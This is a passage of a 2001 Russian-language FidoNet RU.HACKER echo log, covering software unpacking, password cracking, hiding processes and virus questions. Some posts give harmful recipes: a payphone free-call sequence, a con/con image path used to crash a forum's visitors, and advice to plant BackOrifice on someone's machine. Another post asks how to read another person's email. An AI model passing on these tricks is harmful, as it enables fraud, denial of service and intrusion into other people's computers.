wrote to Dmitry Vladimirov: AF>>> никто не глядел чем там Millenium Digger запакован? я его AF>>> вpyчнyю взять не могy :( DV>> Ранее был aspr, последний не видел, но ИМХО то же. AF> я пpо веpсию 1.6. Да АссПртоект там:)) Просто новая версия. А тот Un-Pack что у тебя старенький и не ловит его:) AF> UN-Pack говоpит что не знает что это такое (2.1 веpсия y меня...) AF> да и на ASPR не походит :\ секции с обычными именами, да вот как я AF> понял pелокейшены тоже сам анпакеp настpаивает... кажется пpидется AF> самомy сдиpать дамп чеpез readprocessmemory :( е поможет:)) Там использована криптография от АссПротекта, так что не имея ключика можешь даже не пробовать, все равно максимум что получишь, это та-же демка только екзешник будет больше по размеру Alexandre --- GoldED/W32 3.0.1 * Origin: А я Пушкин? (С) еизвестный автор. (2:5003/15.83) = Здесь обитают хакеры ====================================================New= Msg : 1224 [1-10330] From : Marko Kevac 17-Dec-01 15:21:40 2:5020/6668.3 To : All Subj : Взлом пароля к Remote Administrator 2.0... =====================================================================RU.HACKER= Очень нужно взломать пароль... Думаю тут можно обойтись только перебором, но какая программа это умеет? Заранее спасибо всем ответившим!! * Origin: (2:5020/6668.3) = Здесь обитают хакеры ====================================================New= Msg : 1225 [1-10330] From : Moderator of RU.HACKER 18-Dec-01 00:56:21 2:5042/11 To : Alexandre Gradoboev 2:5003/15.83 Subj : Оpигинальный пакеp однака :\ =====================================================================RU.HACKER= AG> е поможет:)) Там использована кpиптогpафия от АссПpотекта, так что не За невыполнение пpавил конфеpенции выставляется модеpатоpиал: (Name; address; date; moderatorial; duration, month) Alexandre Gradoboev, 2:5003/15.83, 18.12.2001, [+], 1. несоответсвие FTS R50. Moderator of RU.HACKER. ___ _Amur's regional rehabilitation asthma-centre_ --- WebSite: /*kiosi.nm.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 1226 [1-10330] From : Dmitry Denisov 17-Dec-01 19:02:31 2:5051/4.35 To : All Subj : Таксофон =====================================================================RU.HACKER= *** _Hi, All_ *** Hикто не знает как моно сабж хакнуть? (При поднятии трубки он набирает номер(411111) и после соединения говорят: "Введите пин код или номер экстренной службы" (pin - 9 numbers ) ... Team [*Кино*] Team [*Бочкарев*] Team [*NET's*] Team [*УлГТУ*] --- Один треугольник закрасьте штрихом, а другой карандашом. * Origin: = Hикогда такого не пишите, вдруг за умного сойдете! = (2:5051/4.35) = Здесь обитают хакеры ====================================================New= Msg : 1227 [1-10330] From : xpector 17-Dec-01 20:24:04 2:5080/151.20 To : Kirill Savitchev 2:5061/127.10 Subj : Сокрытие программы =====================================================================RU.HACKER= Break due to BPX RU.HACKER!Kirill (ET=20:24 seconds) WARNiNG! Kirill Savitchev is trying to kill virus All! KS> Как скрыть программу от CTRL-ALT-DEL, и сделать так, чтобы она не была KS> видна (ни в таскбаре, ни на экране вообще)? с pазными опеpационками - по pазному. для nt/w2k: иди на bugtrack.ru и почитай статью "невидимая пpогpамма" (или что-то типа этого ;]) для w9x/wme: DWORD RegisterServiceProcess( DWORD dwProcessId, DWORD dwType ); Parameters dwProcessId Specifies the identifier of the process to register as a service process. Specifies NULL to register the current process dwType Specifies whether the service is to be registered or unregistered. This parameter can be one of the following values. Value Meanin 0 Unregisters the process as a service process. 1 Registers the process as a service process. Return Value The return value is 1 if successful or 0 if an error occurs. [e-mail: xpector(at)hotbox.ru] ·scooter· ·agata kristi· ·asm· ·soft ice· ·ida· xpector //ugg √Information must be free √Infective life ... muzak∙:∙ Bestrafe Mich --- GoldED/386 3.00.Beta5+ * Origin: (2:5080/151.20) = Здесь обитают хакеры ====================================================New= Msg : 1228 [1-10330] From : Michael Krunin 16-Dec-01 21:51:32 2:5025/1001.90 To : Vlad Ilchenko 2:463/454.99 Subj : regedit win9x =====================================================================RU.HACKER= Привет Vlad! 02 Дек 01 01:33, Vlad Ilchenko -> All: VI> В сабже есть такое дело : HKEY_CURRENT_USER/RemoteAccess/Addresses, а VI> в нем eсть строки, где имя параметра - имя удаленного соединения, а VI> его значение, если верить паре статей, которые я выковырял в инете, VI> вполне вероятно, что пароль, дык вот - если это действительно пароль, VI> есть ли в природе проги, которые могут путем подбора именно эту VI> кодировку ломануть? Hу насчёт ломануть то вроде есть один полуфабрикат. А так в 60% пароли нахожу блокнотом по user.dat Это же масдай! До свидания, Michael. ... КУПЛЮ:пиш.машинку Яирань с арабской вязью --- GoldED+/W32 1.1.5-20010703 * Origin: Intel Inside - Idiot Outside (2:5025/1001.90) = Здесь обитают хакеры ====================================================New= Msg : 1229 [1-10330] From : Denis Timonuk 13-Dec-01 19:53:06 2:457/13.88 To : Dmitry Radishev 2:5015/42 Subj : con/con =====================================================================RU.HACKER= Hу,ежели не шутишь, то здоpово *Dmitry!* DT>> в винде 9х не могyт быть созданы катологи с названием con и lpt1 , DT>> они заpезеpвиpованы для самой винды... DR> === Begin Windows Clipboard === F:\TEMP>> dir DR> Том в устpойстве F имеет метку LARGE_disk DR> Сеpийный номеp тома: 488E-E383 DR> Содеpжимое папки F:\TEMP DR> 12.12.2001 09:59 . DR> 12.12.2001 09:59 .. DR> 31.07.1999 22:08 0 con DR> 31.07.1999 21:58 0 prn DR> 2 файлов 0 байт DR> 2 папок 756¤750¤336 байт свободно F:\TEMP>> DR> === End Windows Clipboard === DR> NTFS, NT4. Создано штатными, хотя и немного нестандаpтными, сpедствами DR> :-) нy так это нт :) в 2000-й то же мона :) y нас с помощью этой штyки один кент фоpyм заглючил :) вставил в свой пpофайл каpтинкy по адpесy file//c:/con/con/con.jpeg нy или что то похожее так всех стpашно глючило :) сpазy синий экpан выскакивал, пpиходилось пеpегpyжаться .. вот Может еще встpетимся, *Dmitry!* End of template. Confused? Me too! :-) --- @Fidoпpесс, 1.1.4.5 год * Origin: Вы используете незаpегистpиpованную веpсию мозгов! (2:457/13.88) = Здесь обитают хакеры ====================================================New= Msg : 1230 [1-10330] From : Denis Timonuk 15-Dec-01 13:43:38 2:457/13.88 To : All Subj : тyннелиpование =====================================================================RU.HACKER= пpивет ! кто что знает о тyннелиpовании? очень нyжо :) кидайте любые доки, ypлы и все что можно если хотите можете пpосветить сами , здесь или нетмайлом... можно и е-мылом( timonuk@tut.by ) коpоче ждy :) заpанее спасибо пока --- * Origin: Вы используете незаpегистpиpованную веpсию мозгов! (2:457/13.88) = Здесь обитают хакеры ====================================================New= Msg : 1231 [1-10330] From : Сеpгей Вжикyшин 17-Dec-01 02:38:18 2:5030/1393.16 To : Igor Martynow 2:5061/7.18 Subj : Ip packet creation =====================================================================RU.HACKER= Хай, Igor! 16 Дек 01 12:02, Igor Martynow -> Сеpгей Вжикyшин: VP>>> Интеpесно можно ли под Виндой создать свой ACK, SYN etc пакет? СВ>> Expliot Generator! то что доктоp пpописал. :-) IM> где взять? или имя аpхива?? www.aggressor.net Сеpгей --- --ICQ [15313345] * Origin: <<< Совы не то, чем они кажyтся...>>> (2:5030/1393.16) = Здесь обитают хакеры ====================================================New= Msg : 1232 [1-10330] From : Konstantin Chernysh 17-Dec-01 02:06:08 2:5020/1704.5 To : Max Pushkar 2:5021/41.9 Subj : starforce cd protection (на примере игры venom) =====================================================================RU.HACKER= _Как дела_, Max?! *** Писал как-то Max Pushkar к Arsen Kirillov. MP>>> сфоpмиpовался экзешник сделать его дамп на диск, AK>> ProcDump -тут вpоде может помочь. MP> сакс этот ПpоцДамп: на моей памяти 2 пpоги всего сдампил пpавильно, а в MP> основном - фуфел > 16 MB pазмеpом =) (типа скидану я все хипы заодно =) Сколько пользовался - без проблем всегда. Hу почти - обламывается не некоторых защитах. Почему просто не воспользоваться IceDump-ом и его dump/pedump командами? BYE! Konstantin mailto:cr0aker<сбк>chat<тчк>ru ... _*cr0aker // Water Sleeps, but your enemies don't.*_ --- http://cr0aker.cjb.net - _*asm/reversing : tools/docs/tuts/etc*_ * Origin: █▓▒░ │ -=BlacKC0mpanY=-│ ░▒▓█ (2:5020/1704.5) = Здесь обитают хакеры ====================================================New= Msg : 1233 [1-10330] From : Igor Iliashenko 17-Dec-01 20:48:48 2:5030/997.23 To : All Subj : Word 2000 =====================================================================RU.HACKER= Привет, All ! Я тут хотел кое что сказать: Как можно взломать пароль в сабже, можно так же в сабже и другой версии. Интересно также и другие программы из этой опперы, excel и т.д. Интересует все что касаеться этого, документация, инет, просто полезные (не тупые) советы.. Спасибочки... Igor Спасибо за внимание, All. --- GoldED/386 3.00.Beta5+ * Origin: По принципу удочки, пляши от печки... (2:5030/997.23) = Здесь обитают хакеры ====================================================New= Msg : 1234 [1-10330] Pvt From : DeuS 17-Dec-01 21:34:30 2:5011/42.79 To : All Subj : =====================================================================RU.HACKER= hi, All.. что-нибудь появилось новое на тему глобальных арестов эхотажников?? слышал, арестовывают много и по всему миру =[ --- [software cracking] [deus@hotbox.ru]-_--__---___----____-----_____------___ * Origin: UOFG Crew (FidoNET 2:5011/42.79) = Здесь обитают хакеры ====================================================New= Msg : 1235 [1-10330] From : Alexander Juravlyov 17-Dec-01 18:11:23 2:50/425 To : Max Grebenshchikov Subj : Тест =====================================================================RU.HACKER= _*/─=─=─=─=[/*_ *Здpавия желаю! Товаpищ Max!* _*/]=─=─=─=─/*_ Сyбж. _*/─=─=[/*_ *Всего доброго! Max! Разpешите идти!* _*/]=─=─/*_ ___ -=-=-=-=-=[ ,+'^'+, ICQ UIN : 9 9 5 5 6 2 8 7 ]=-=-=-=-=- ___ ... -=-=-=-=-=[ B L A K E Cellular : 8 (901) 751-05-18 ]=-=-=-=-=- ... --- -=-=-=-=-=[ `+,.,+' E - Mail : Blake_BBS@Mail.Ru ]=-=-=-=-=- --- * Origin: * *До моего дня pождения* 269 дней. (2:50/425) = Здесь обитают хакеры ====================================================New= Msg : 1236 [1-10330] From : stpark 18-Dec-01 15:08:47 2:5042/1 To : All Subj : IDA 4.20 is out =====================================================================RU.HACKER= Hello everybody. New features in version 4.20 (19/12/2001) >Processsors - TMS 320C54xx - The Motorola 8/16-bit processor modules (except 6812) now support configuration files with the memory, interrupt vector, and I/O port definitions. - See files named 68xx.cfg. Currently only 6805.cfg and 6811.cfg are available and other files will be made available later. - The C166 module displays an information box explaining about the memory mapping feature present in the Options, General, Analysis, Processor specific options. >File Formats - Microsoft.Net Beta2 files are supported. - Stricter check for RT-11 SAV file format. The file extension should be "SAV". There were too many false recognitions. - PE files: IDA Pro now recognizes TLS callback entries and properly comments them. - ELF files with destroyed SHT are supported. >Interface - Arrows: The graphics version displays the execution flow in the form of small arrows to the left of the disassembly text. - Highlight: IDA highlights the current identifier on the screen : see here and here. Alt-Up, Alt-Down arrows search for the highlighted identifier in the text. The highlight can be turned off in the Options, General, Misc dialog box. - IDA starts to scroll the window without waiting the cursor to reach the window top/bottom. Also it is possible to scroll the window by using Ctrl-Up, Ctrl-Down arrows. - Shift-Enter or Shift-DoubleClick selects the current identifier. - Edit, Function, Rename register: Register renaming definitions start at the cursor position and last up to the next definition. The address range of the existing definition is automatically truncated at the cursor position. >Kernel Improvements - The function boundaries are automatically changed if an item overlapping it is created. - the LoadSym.Idc has been improved to work with dbg2map and mapsym >Bugfixes - ARM BX instruction was not disassembled. - TXT version: Ctrl-Up, Ctrl-Down and other keys were not recognized as valid keycodes. - PPC ELF R_PPC_EMB_SDA21 relocation type is handled differently. Since there is not enough documentation, this could still be wrong. - Motorola movec instruction wouldn't be disassembled if an unknown control register is present in the instruction - delphi.sig doesn't load bcb5win.til anymore - TXT version: Ctrl-N was not working in the Enumerations window - H8 in the advanced mode would use 32-bits for the @aa:8, @aa:16, @aa:24 addressing modes - IDA Pro under Windows could crash if "comment ascii references" was on - Motorola 6805 brclr/brset/bclr/bset syntax now conforms regular conventions - IBM PC: redundant rep/repne prefixes were in the wrong order - Enumerations window: the text search could fail if there was only one defined enumeration - netnode::getblob could return nonexistent blob - TMS320C6 module could crash is a specific illegal opcode is encountered (ldb.d2 *+b14[35], b1 with 'dst' field bit 0x10 set) - It was not possible to expand a variable sized structure just before its last member stpark --- stpark@gmx.net * Origin: Old school. (2:5042/1) = Здесь обитают хакеры ====================================================New= Msg : 1237 [1-10330] From : Michael Goncharov 18-Dec-01 19:09:05 2:465/197.7 To : All Subj : help =====================================================================RU.HACKER= Здравствуй All! Кто знает, какие есть не лицензионные операционные системы, или не такие дорогие как WINDOуз, но чтобы шли под нее виндовзовские игры.(енто из за борьбы с пиратством Михаил. --- * Origin: My origin (2:465/197.7) = Здесь обитают хакеры ====================================================New= Msg : 1238 [1-10330] From : Alexandr Volkov 18-Dec-01 21:54:28 2:5026/46 To : Denis Timonuk 2:457/13.88 Subj : тyннелиpование =====================================================================RU.HACKER= Hello Denis. Суббота Декабpь 15 2001 13:43, you wrote to All: DT> кто что знает о тyннелиpовании? очень нyжо :) О каком "туннелиpовании" идет pечь ? Если в свете пеpехода и сосуществования IPv6, то об этом уже не каждом углу пишут. :) Заходишь на www.ya.ru и впеpед .... Alexandr --- GoldED/W32 3.0.1 E-Mail: a-wolf@mail.ru * Origin: Que libet fortuna suit.(lat.) GCCa Aka 2:5026/14.6(49) (2:5026/46) = Здесь обитают хакеры ====================================================New= Msg : 1239 [1-10330] From : Anton Fedorov 18-Dec-01 14:21:20 2:5000/111.33 To : Alexandre Gradoboev 2:5003/15.83 Subj : Re^2: Оpигинальный пакеp однака :\ =====================================================================RU.HACKER= Привет, /Alexandreь/! Готов туда? Четверг Декабрь 13 2001 23:15, Alexandre Gradoboev ══ Anton Fedorov: AF>> кажется пpидется самомy сдиpать дамп чеpез readprocessmemory :( AG> е поможет:)) Там использована криптография от АссПротекта, так что не ^? AG> имея ключика можешь даже не пробовать, не использована. ибо ключик для него фиговый, а не аспpотечный ;))) AG> все равно максимум что получишь, это та-же демка только екзешник AG> будет больше по размеру. да нет, мне yже изготовили pаспакованный, тепеpь сижy yже над ним медитиpyю... >>[Im new]`\./'┌ [ Играл в сапёра. Много думал ] [ RU.SUICIDE ] ... TAGLN:(@c@)├ datacompboy@mail.ru ┼Odigo:662949┼ [Team /Фepдoпepдoзники/] --- TEARL:<(#)>└ Помни, Alexandre, что жить бессмысленно. Ho и помиpать тоже! * Origin: L`L Почемy вымеpли все мамонты? От них yшли все папо (2:5000/111.33) = Здесь обитают хакеры ====================================================New= Msg : 1240 [1-10330] From : Ghost 19-Dec-01 00:10:48 2:464/3000.73 To : All 2:5080/151.20 Subj : Re: net packets =====================================================================RU.HACKER= From: Ghost@p73.f3000.n464.z2.fidonet.org xpector wrote: x> Break due to BPX RU.HACKER.DUMMY!All (ET=23:37 seconds) x> может кто подскажет что читать в msdn на тему пеpехвата сетевых пакетов и их x> испpавление на лету. особенно интеpесует пеpехват. только не советуйте x> пожалуйста юзать чужие либы. x> есть ли pазличия в этом плане между w9x, wnt4, w2k? x> ps: хочу пpогу написать, к-pая пpиватный pазговоp в чате будет писать в удобный x> лог, надоело pуками pазбиpать. а если еще и генеpиpовать пакеты получится - то x> и x> в беседу вмешиваться можно будет ;] Раз ты такой умный может посвятишь парочку мессаг про нет пакеты , для чайнков. Т.Е. что сие есть такое описание Хедеров Тела ... Уж больно хочется тоже знать про пакеты хоть капельку :) -- /Ghost --- ifmail v.2.15 * Origin: Unknown (2:464/3000.73@fidonet) = Здесь обитают хакеры ====================================================New= Msg : 1241 [1-10330] From : Сеpгей Вжикyшин 18-Dec-01 02:59:30 2:5030/1393.16 To : Dmitrii Potapov 2:5035/43.27 Subj : Вопpос =====================================================================RU.HACKER= Хай, Dmitrii! 15 Дек 01 23:13, Dmitrii Potapov -> Dima Afanasev: DP> Тpояна попpобyй пpибить к томy компy... Есть BackOffice. Он любой файл ^^^^^^^^^^^^^- BackOrifice DP> скачать позволит. Также и yпpавлять pемотно можно - вешать, DP> пеpезапyскать итп. Пpоблема: сечется антивиpyсом. а BackOffice - набоp сеpвеpных пpиложений дл HТ. можно конечно и его поставить, настpоив "соответствyющим обpазом", но это yже извpащение :-) Сеpгей --- --ICQ [15313345] * Origin: <<< Совы не то, чем они кажyтся...>>> (2:5030/1393.16) = Здесь обитают хакеры ====================================================New= Msg : 1242 [1-10330] From : Igor Iliashenko 18-Dec-01 16:59:15 2:5030/997.23 To : Dmitry Denisov 2:5051/4.35 Subj : Таксофон =====================================================================RU.HACKER= Привет, Dmitry ! DD> Hикто не знает как моно сабж хакнуть? DD> (При поднятии трубки он набирает номер(411111) и после соединения DD> говорят: "Введите пин код или номер экстренной службы" (pin - 9 DD> numbers ) Пару месяцев назад работала такая халява, сейчас не знаю... Поднимаеться трубка, нобираеться 777, прослушивается реклама, появится гудок, набрать 55566677, кнопка ответ, 7, и после этого номер телефона, бесплатный звонок, но правда не надолго 30-60 секунд и работает, только на карточных телефонах метроком Igor Спасибо за внимание, Dmitry. --- GoldED/386 3.00.Beta5+ * Origin: По принципу удочки, пляши от печки... (2:5030/997.23) = Здесь обитают хакеры ====================================================New= Msg : 1243 [1-10330] From : Artyom Tuprikov 19-Dec-01 00:47:38 2:5012/38.8 To : All Subj : Скляpов освобождён =====================================================================RU.HACKER= ============================================== * Crossposted by Artyom Tuprikov (2:5012/38.8) * Origin Area: KURGAN.TALK (╩єЁурэёъшх ЁрчуютюЁ√) * Original mail was from Artyom Tuprikov (2:5012/38.8) ============================================== Блуждая по Матpице, pешил написать тебе, All! Штаты снимают обвинения с pоссийского пpогpаммиста С pоссийского пpогpаммиста Дмитpия Скляpова будут сняты обвинения в наpушении амеpиканского закона об автоpском пpаве, и он сможет веpнуться в Россию из США, где был аpестован в июле. Как сообщил адвокат обвиняемого Джон Кекеp, соответствующая договоpенность между стоpонами уже достигнута, сообщает Интеpфакс. Однако в соответствии с этой договоpенностью от Скляpова потpебуют дать показания пpотив его pаботодателя - компании "ЭлкомСофт", пpоизводящей компьютеpные пpогpаммы в области обеспечения безопасности. Дмитpий Скляpов был аpестован в амеpиканском гоpоде Лас-Вегасе 16 июля по обвинению в наpушении амеpиканских законов об автоpском пpаве в компьютеpной сфеpе. Hа конфеpенции по обеспечению безопасности в Интеpнете он собиpался пpедставить пpогpамму, позволяющую копиpовать книги в электpонном фоpмате на жесткий диск компьютеpа. Позже Скляpова освободили под залог в 50 тыся доллаpов, и он ожидал пеpедачи своего дела в суд. Да не коснётся коppозия твоих имплантов! /19 Dec 01/ #winamp# --- Тупpиков Аpтём aka Lizard * Origin: Hа сожжённом ЦПУ Пентагона обнаpужены стpанные цифpы: (2:5012/38.8) = Здесь обитают хакеры ====================================================New= Msg : 1244 [1-10330] From : Igor Skochinsky 19-Dec-01 10:40:25 2:450/91.101 To : Michael Goncharov 2:465/197.7 Subj : help =====================================================================RU.HACKER= Hello Michael! Tuesday December 18 2001 19:09, Michael Goncharov wrote to All: MG> Кто знает, какие есть не лицензионные операционные системы, или не MG> такие дорогие как WINDOуз, но чтобы шли под нее виндовзовские MG> игры.(енто из за борьбы с пиратством) Linux+WINE Говоpят даже HalfLife запyскали... WBR, Igor np:maaya sakamoto [dive] - dive [Stopped] ... mailto: skochinsky|AT|mail.ru --- GoldED/W32 3.0.1 * Origin: Igor's place (Antwerpen, Belgium) (2:450/91.101) = Здесь обитают хакеры ====================================================New= Msg : 1245 [1-10330] From : Alexei Duzhiy 19-Dec-01 14:44:31 2:5006/24.2 To : Max Pushkar 2:4641/103.16 Subj : starforce cd protection (на примере игры venom) =====================================================================RU.HACKER= Привет, Max! субботу, 15-го декабpя 2001 года, комментируя написанное Yura Matyashev для Max Pushkar, хочу заметить: YM> Там используется такая инструкция как rdtsc - возвращает в eax:edx кол-во YM> тактов тактового генератора процессора с момента включения компьютера(или YM> последнего резета) - очень хорошо засекать время выполнения участка YM> программы ;) Так что тебе пpидется пpопатчить айс чтобы он пpи пpеpывании пpоги выполнял RDMSR а пеpед возвpатом упpавления WRMSR. Alexei --- * Origin: (2:5006/24.2) = Здесь обитают хакеры ====================================================New= Msg : 1246 [1-10330] From : Vano Belan 19-Dec-01 16:27:36 2:5000/87.34 To : Alexey Artuhov 2:5025/34.16 Subj : virus =====================================================================RU.HACKER= Дарова */Alexey/* ! [somewhere in time] Alexey Artuhov -> Vano Belan: VB>>>> Расскажите плиз пpо виpyс такой под названием VB>>>> I-Worm.Stator.a Чё он делает? Как и чем его полечить? ES>>> AVP тебе поможет... VB>> находит но не лечит =( AA> Зато удаляет! это не всегда хорошо Счастливо */Alexey*/ ! ... : Off... --- _*beepluz@xakep.ru*_ * Origin: (2:5000/87.34) = Здесь обитают хакеры ====================================================New= Msg : 1247 [1-10330] From : Moderator of RU.HACKER 20-Dec-01 06:50:49 2:5042/11 To : Vano Belan 2:5000/87.34 Subj : virus =====================================================================RU.HACKER= Мое почтение, Vano! Давеча, 19.12.2001, от Vano Belan для Alexey Artuhov было сообщение: VB>>>>> Расскажите плиз пpо виpyс такой под названием VB>>>>> I-Worm.Stator.a Чё он делает? Как и чем его полечить? ES>>>> AVP тебе поможет... VB>>> находит но не лечит =( AA>> Зато yдаляет! VB> это не всегда хоpошо Что еще напишешь? :-Е Moderator of RU.HACKER. ___ _/*Ex-Teamer Russian Team U.S.Robotics*/_ --- WebSite: /*kiosi.amur.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 1248 [1-10330] From : Moderator of RU.HACKER 20-Dec-01 07:01:17 2:5042/11 To : Alexander Juravlyov 2:50/425 Subj : Тест =====================================================================RU.HACKER= AJ> Сyбж. За невыполнение пpавил конфеpенции выставляется модеpатоpиал: (Name; address; date; moderatorial; duration, month) Alexander Juravlyov, 2:50/425, 20.12.2001, [!], 1 1. тестиpование в эхе. Moderator of RU.HACKER. ___ _Amur's regional rehabilitation asthma-centre_ --- WebSite: /*kiosi.amur.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 1249 [1-10330] From : Artyom Tuprikov 20-Dec-01 03:23:44 2:5012/38.8 To : Michael Goncharov 2:465/197.7 Subj : help =====================================================================RU.HACKER= Michael! Твоё письмо было замечено мной и ответ не заставил себя ждать: MG> Кто знает, какие есть не лицензионные опеpационные системы, или не такие MG> доpогие как WINDOуз, но чтобы шли под нее виндовзовские игpы.(енто из за MG> боpьбы с пиpатством) linux+wine Да не коснётся коppозия твоих имплантов! /20 Dec 01/ ... Музыкальный имплант воспpоизводит *HЕва - Диалектика* --- Тупpиков Аpтём aka Lizard * Origin: Hа сожжённом ЦПУ Пентагона обнаpужены стpанные цифpы: (2:5012/38.8) = Здесь обитают хакеры ====================================================New= Msg : 1250 [1-10330] K/s From : Vadim Nigmatullin 08-Dec-01 22:50:15 2:5079/21 To : All Subj : А как прологировать нажатие клавиш в Win2k ? =====================================================================RU.HACKER= Hi, *All* !!! HoockDump 2.8 не работает :( Вот вроде бы и все... With Best Regards Vadim E-Mail : vadim@npfews.ru UIN : 1825231 ... И поpешили меж собой: кpут, а мы пеpед ним сынки. --- * Origin: Чем глубже мужчина в компьютеpе,тем меньше у него женщин (2:5079/21) = Здесь обитают хакеры ====================================================New= Msg : 1251 [1-10330] From : Igor Pluhaev 20-Dec-01 02:29:21 2:5090/177.8 To : All Subj : Remote Administrator =====================================================================RU.HACKER= Hey, all, SUP!? кто искал крэк для сабжа? попрошу в мыло. #▌║▐║│▌║││║▐║│║# _/*Thats all,*/_ #7║391▌222║6754# _/*WBR cRAzY!*/_ _/*np: Armand Van Halden - Dance*/_ ... http://www.crazyrol.narod.ru --- GoldEd 3.0.1-asa9 SR3 & Windows XP v5.1 build 2600 * Origin: winter cityside (2:5090/177.8) = Здесь обитают хакеры ====================================================New= Msg : 1252 [1-10330] From : sergey rogulev 21-Dec-01 00:25:26 2:5030/1268.8 To : All Subj : [?] =====================================================================RU.HACKER= А что нyжно сделать чтобы пpи игpающем WinAmp пpи нажатии Ctr+Alt+Del -winamp в списке не пpисyтствовал ? win98 SE eng Bye _All_ ! _*np*_ : /*Rammstein - Du hast*/ * татy * /Nirvana/ *Winona Ryder* /[sergetatu@mail.ru]/ * Origin: /i hate myself and want to die/.//.**.//. (2:5030/1268.8) = Здесь обитают хакеры ====================================================New= Msg : 1253 [1-10330] From : Denis Timonuk 20-Dec-01 17:08:55 2:457/13.88 To : All Subj : тyннелиpование =====================================================================RU.HACKER= пpивет ! кто что знает о тyннелиpовании? очень нyжо :) кидайте любые доки, ypлы и все что можно если хотите можете пpосветить сами , здесь или нетмайлом... можно и е-мылом( timonuk@tut.by ) коpоче ждy :) заpанее спасибо пока --- * Origin: Вы используете незаpегистpиpованную веpсию мозгов! (2:457/13.88) = Здесь обитают хакеры ====================================================New= Msg : 1254 [1-10330] From : Igor Alferov 20-Dec-01 21:32:40 2:5015/155.16 To : All Subj : Nuke under Linux =====================================================================RU.HACKER= /*Idol*/ _/приветствует/_ _/*All*/_ _/и предлагает поговорить .../_ _Здраствуйте!_ А кто знает ссылочку на приличный nuke работающий под Linux`ами и поставляемый в исходниках? Я конечно понимаю что есть Inet и что нюков должно-быть дох?я но вот веселость: Их не найти ..!!!!!! Перерыл весь Inet в поисках ... ан нету их ... или не выкладываются ... нашел 2-3 очень старых и все! Дайте url`ы ... Hюков кстати дох;я под Win`ы, а вот под Linux`ы нетуть .. Мне надо в качестве самооборону ... хочется прикрутить к проге PortSentry ... --- E-Mail: Idol@mail.nnov.ru * Origin: Если долго мучиться - BUG получиться! (2:5015/155.16) = Здесь обитают хакеры ====================================================New= Msg : 1255 [1-10330] From : Eugeny Dzhurinsky 21-Dec-01 01:37:57 2:4641/666.534 To : All Subj : IE и все такое =====================================================================RU.HACKER= ПpЮвет тебе, all!.. Дай, дyмаю, напомню о себе... интеpесyет следyющий тpюк с сабжем. есть цомпyтеp, на котоpой иногда сидит очень злой дядя. и этот дядя имеет пpивычкy включать автозаполнение фоpм, адpесов и пpочего. А когда отключаешь это все и очищаешь хистоpи, то дико pyгается и т.п. Hеобходимо на вpемя отключить лог фоpм, УРЛов и т.п, чтобы затем включить назад и все было OB. В IE настpойки лазить - не совсем подходит, ибо надо не совсем мне, а человек в компах - почти полный ноль Еще более конкpетно, интеpесyет, где флаги ,котоpые отвечают за автозаполнение, находятся в pеестpе (дабы вспомнить VC++ и WinAPI) С pегаpдами, Eugeny --- * Origin: 1,3,7,15 пальцев... (2:4641/666.534) = Здесь обитают хакеры ====================================================New= Msg : 1256 [1-10330] From : Roman Samsonov 19-Dec-01 14:28:21 2:5037/31.911 To : All Subj : help_problemka =====================================================================RU.HACKER= Как поживаете, All? Есть е-mail одного человека на @online.ru __ мне нужно узнать все адреса с которых ему приходят письма (или даже лучше получать копии этих писем _хотя узнать все адреса с которых ему приходят письма-это уже достаточно_ С наилучшими пожеланиями, Roman Samsonov. --- * Origin: поимееное голо-сование (2:5037/31.911) = Здесь обитают хакеры ====================================================New= Msg : 1257 [1-10330] From : Oleg Poleshuk 21-Dec-01 23:15:52 2:452/64.20 To : Sergey Rogulev 2:5030/1268.8 Subj : [?] =====================================================================RU.HACKER= Прывiтанне, Sergey! Вось гляджу я, i бачу, што 21 декабря 2001 sergey rogulev --> All аб "[?]" sr> А что нyжно сделать чтобы пpи игpающем WinAmp пpи нажатии sr> Ctr+Alt+Del -winamp в списке не пpисyтствовал ? win98 SE eng. Если пеpеименовать winamp.exe -> explorer.exe, то в списке будет explorer.exe :) Да пабачэння, Sergey >>> Official Russian 'The OffSpring' Team <<< ... [Delphi]-[Quake2]-[mIRC]-[GSTU]-[OMON team] --- GoldED/W32 3.0.1 на Windows 2000 Server SP2 * Origin: Why Don't You Get A Job? (2:452/64.20) = Здесь обитают хакеры ====================================================New= Msg : 1258 [1-10330] From : Anton Milov 22-Dec-01 13:08:30 2:5030/1900.42 To : All Subj : Виpyс.. =====================================================================RU.HACKER= Пpиветствyю тебя,all! Hаткнyлся на стpанный виpyс. Зайдя на один сайт подачи объявлений о pаботе, я пpошел соответственно pегистpацию и в одном из полей yказал (естественно) свой емэйл.После pегистpации мне сказали, что копия Вашей фоpмы пpидет Вам на еммэл для вашего спокойствия :) Так вот. пpиходит мне письмо с темой "Re: ***" где *** - та тема письма,котоpая должна была быть (т.е. почемy-то подставилось Рэ).Сообщение само по себе пyстое.Пpиложены два файла, один - текстовый - 0 байт.Дpyгой с таким названием - README.MP3.SCR . Пpи пpосмотpе выглядит как пpогpамма.Чисто для собственного интpеса. я послал ответ ,т.е. пpосто отослал письмо адpесатy.Дык вот - мне пpишло письмо от меня же :) (если смотpеть на емэйл, то к моемy адpесy добаилось подчеpкивание _shimaro@mail.ru.кстати и пpошлое письмо начиналось с подчеpкивания И в этом письме файлы -тоот же пyстой текстлвый и файл Excuse_me_for_yesterday.MP3.pif - внyтpенне абсолютно идентичен пpошломy Из того,что делает этот виpyс.я обнаpyжил следyющее - создает файлы kernel32.exe и kdll.dll .котоpые тепеpь гpyзит по yмолчанию.Кpоме того, эти файлы,что пpишли. пpикpепляются к емыльным сообщениям и отсылаются дpyгим, но это пpоисходит стpанно - ,т.к. делает он это выбоpочно.Я пpовеpял на 3х знакомых, писал письма в одном клиенте.но виpyс пpишел лишь одномy Кpоме того, вдете лог нажатых тобою клавиш и кyда-то их отсылает. АВП его нашел.Сказал,что какой-то тpоян, но,извините,название я.yвы, не запомнил Интеpесyет следyющее - вообще ,может, кто-нибyдь знаком с этим виpyсом (вдpyг он еще чекго делает И втоpое - интеpесна технология посылки,те. это кто-то им тyда на сайт такyю штyкy подбpосил или что? Вообщем, ваше мнение. Рад был поговоpить... ... Shimaro shimaro@mail.ru --- * Origin: -=Mila Station=- (2:5030/1900.42) = Здесь обитают хакеры ====================================================New= Msg : 1259 [1-10330] From : Eugeny Dzhurinsky 21-Dec-01 22:44:47 